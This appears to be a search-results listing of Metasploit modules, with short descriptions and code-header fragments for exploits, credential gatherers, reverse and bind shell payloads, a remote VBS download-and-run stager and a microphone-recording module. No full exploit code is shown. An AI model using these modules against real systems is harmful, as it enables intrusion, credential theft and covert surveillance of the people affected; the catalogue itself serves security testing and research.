6846 matches found
Android Open Source Platform (AOSP) Browser UXSS
This module exploits a Universal Cross-Site Scripting UXSS vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on 'Android Open Source Platform AOSP Browser UXSS', 'Description' = %q This module exploits a Universal Cross-Site Scriptin...
Multi Manage DbVisualizer Query
Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases With GUI. The remote database can be accessed from the command line without the need to authenticate, and this module abuses this functionality to query and will store the results. Please note: backslash quot...
Powershell Base64 Command Encoder
This encodes the command as a base64 encoded command for powershell. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework include Msf::Post::Windows class MetasploitModule 'Powershell Base64 Command Encoder', 'Description'...
OSX Gather Safari LastSession.plist
This module downloads the LastSession.plist file from the target machine. LastSession.plist is used by Safari to track active websites in the current session, and sometimes contains sensitive information such as usernames and passwords. This module will first download the original...
OSX Manage Record Microphone
This module will allow the user to detect with the LIST action and capture with the RECORD action audio inputs on a remote OSX machine. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'shellwords' class...
D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices. It is possible that this module...
OpenSSL TLS 1.1 and 1.2 AES-NI DoS
The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with a TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesnicbchmacsha1cipher is only included in the 64-bit versions of...
Digi ADDP Information Discovery
Discover host information through the Digi International ADDP service This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Digi ADDP Information Discovery', 'Description' = 'Discover host informatio...
Modbus Unit ID and Station ID Enumerator
Modbus is a cleartext protocol used in common SCADA systems, developed originally as a serial-line RS232 async protocol, and later transformed to IP, which is called ModbusTCP. default tcp port is 502. This module sends a command 0x04, read input register to the modbus endpoint. If this command i...
Windows Manage Safe Delete
The goal of the module is to hinder the recovery of deleted files by overwriting its contents. This could be useful when you need to download some file on the victim machine and then delete it without leaving clues about its contents. Note that the script does not wipe the free disk space so...
Java Applet Field Bytecode Verifier Cache Remote Code Execution
This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operation...
Modbus Version Scanner
This module detects the Modbus service, tested on a SAIA PCD1.M2 system. Modbus is a clear text protocol used in common SCADA systems, developed originally as a serial-line RS232 async protocol, and later transformed to IP, which is called ModbusTCP. This module requires Metasploit:...
IBM Personal Communications iSeries Access WorkStation 5.9 Profile
The IBM Personal Communications I-Series application WorkStation is susceptible to a stack-based buffer overflow vulnerability within file parsing in which data copied to a location in memory exceeds the size of the reserved destination area. The buffer is located on the runtime program stack. Wh...
Windows Gather VNC Password Extraction
This module extract DES encrypted passwords in known VNC locations This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather VNC Password Extraction', 'Description' = %q This module extrac...
Unix Command Shell, Bind TCP (via perl) IPv6
Listen for a connection and spawn a command shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 152 include Msf::Payload::Single include Msf::Sessions::CommandShellOptio...
Windows Disconnect Wireless Connection
This module disconnects the current wireless network connection on the specified interface. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Disconnect Wireless Connection', 'Description...
Windows Gather Forensics Duqu Registry Check
This module searches for CVE-2011-3402 Duqu related registry artifacts. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Forensics Duqu Registry Check', 'Description' = %q This...
eSignal and eSignal Pro File Parsing Buffer Overflow in QUO
The software is unable to handle the "" files even those original included in the program like those with the registered extensions QUO, SUM and POR. Successful exploitation of this vulnerability may take up to several seconds due to the use of egghunter. Also, DEP bypass is unlikely due to the...
Windows Gather Run WMIC Commands
This module executes WMIC commands on the specified host. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather Run WMIC Commands', 'Description' = %q This module executes WMIC command...
IBM Tivoli Endpoint Manager POST Query Buffer Overflow
This module exploits a stack based buffer overflow in the way IBM Tivoli Endpoint Manager versions 3.7.1, 4.1, 4.1.1, 4.3.1 handles long POST query arguments. This issue can be triggered by sending a specially crafted HTTP POST request to the service lcfd.exe listening on TCP port 9495. To trigge...
Windows Executable Download and Evaluate VBS
Downloads a file from an HTTPS URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize =...
HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 prior to NNM01203. By making a specially crafted HTTP request to the "snmpviewer.exe" CGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary code. The vulnerable code lies within ...
Windows Gather ARP Scanner
This Module will perform an ARP scan for a given IP range through a Meterpreter Session. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Gather ARP Scanner', 'Description' = %q This...
Apache Tomcat Transfer-Encoding Information Disclosure and DoS
Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service application outage or obtain sensitive information via a crafted header that interferes with "recycling...
Apache HTTPD mod_negotiation Scanner
This module scans the webserver of the given hosts for the existence of modnegotiate. If the webserver has modnegotiation enabled, the IP address will be displayed. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework clas...
MOXA Device Manager Tool 2.1 Buffer Overflow
This module exploits a stack buffer overflow in MOXA MDM Tool 2.1. When sending a specially crafted MDMGw MDM2Gateway response, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the DBMSEXPORTEXTENSION.GETDOMAININDEXMETADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. This module requires Metasploit: https://metasploit.com/download Current source:...
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code. This module requires Metasploit: https://metasploit.com/download Current source:...
Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include
This module exploits a remote file inclusion vulnerability in includes/Cache/Lite/Output.php in the CacheLite package in Mambo 4.6.4 and earlier. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule...
Microsoft SQL Server Configuration Enumerator
This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied. This module requires Metasploit: https://metasploit.com/download Current source:...
Windows Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 148 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo...
phpBB viewtopic.php Arbitrary Code Execution
This module exploits two arbitrary PHP code execution flaws in the phpBB forum system. The problem is that the 'highlight' parameter in the 'viewtopic.php' script is not verified properly and will allow an attacker to inject arbitrary code via pregreplace. This vulnerability was introduced in...
PHP Command, Double Reverse TCP Connection (via Perl)
Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Payload::Php include...
SlimFTPd LIST Concatenation Overflow
This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo. This module requires Metasploit:...
Browse the session filesystem in a Web Browser
This module allows you to browse the session filesystem via a local browser window. Module Options msf use post/multi/manage/fileshare msf postfileshare show actions ...actions... msf postfileshare set ACTION msf postfileshare show options ...show and set options... msf postfileshare run This...
IPFire 2.25 Core Update 156 and Prior pakfire.cgi Authenticated RCE
This module exploits an authenticated command injection vulnerability in the /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156 and prior to execute arbitrary code as the root user. Module Options msf use exploit/linux/http/ipfirepakfireexec msf...
Redis Extractor
This module connects to a Redis instance and retrieves keys and data stored. Module Options msf use auxiliary/gather/redisextractor msf auxiliaryredisextractor show actions ...actions... msf auxiliaryredisextractor set ACTION msf auxiliaryredisextractor show options ...show and set options... msf...
VMware vRealize Operations (vROps) Manager SSRF RCE
This module exploits a pre-auth SSRF CVE-2021-21975 and post-auth file write CVE-2021-21983 in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the...
WordPress Simple File List Unauthenticated Remote Code Execution
Simple File List simple-file-list plugin before 4.2.3 for WordPress allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded fir...
Windows Inject PE Files, Hidden Bind TCP Stager
Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address of entry after performing image base relocation and API address resolution. This module requires a PE file that contains...
Linux Gather HexChat/XChat Enumeration
This module will collect HexChat and XChat's config files and chat logs from the victim's machine. There are three actions you may choose: CONFIGS, CHATS, and ALL. The CONFIGS option can be used to collect information such as channel settings, channel/server passwords, etc. The CHATS option will...
Horde CSV import arbitrary PHP code execution
The HordeData module version 2.1.4 and before present in Horde Groupware version 5.2.22 allows authenticated users to inject arbitrary PHP code thus achieving RCE on the server hosting the web application. This module requires Metasploit: https://metasploit.com/download Current source:...
FreeBSD rtld execl() Privilege Escalation
This module exploits a vulnerability in the FreeBSD run-time link-editor rtld. The rtld unsetenv function fails to remove LD environment variables if findenv fails. This can be abused to load arbitrary shared objects using LDPRELOAD, resulting in privileged code execution. This module has been...
IBM WebSphere MQ Channel Name Bruteforce
This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework...
Brother Debut http Denial Of Service
The Debut embedded HTTP server 'Brother Debut http Denial Of Service', 'Description' = %q The Debut embedded HTTP server MSFLICENSE, 'Author' = 'z00n ', vulnerability disclosure 'h00die' metasploit module , 'References' = 'CVE', '2017-16249' , 'URL',...
Cambium cnPilot r200/r201 SNMP Enumeration
Cambium cnPilot r200/r201 devices can be administered using SNMP. The device configuration contains IP addresses, keys, passwords, & lots of juicy information. This module exploits an access control flaw, which allows remotely extracting sensitive information such as account passwords, WiFI PSK, ...
Cambium cnPilot r200/r201 File Path Traversal
This module exploits a File Path Traversal vulnerability in Cambium cnPilot r200/r201 to read arbitrary files off the file system. Affected versions - 4.3.3-R4 and prior. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framewor...
Linux Meterpreter, Reverse HTTPS Inline
Run the Meterpreter / Mettle server payload stageless This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Module generated by tools/modules/generatemettlepayloads.rb module MetasploitModule CachedSize = 1166612 include...
Multi Gather Maven Credentials Collection
This module will collect the contents of all users settings.xml on the targeted machine. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'nokogiri' class MetasploitModule 'Multi Gather Maven Credentials...
Razer Synapse rzpnk.sys ZwOpenProcess
A vulnerability exists in the latest version of Razer Synapse v2.20.15.1104 as of the day of disclosure which can be leveraged locally by a malicious application to elevate its privileges to those of NTAUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler in the rzpnk.sys driver th...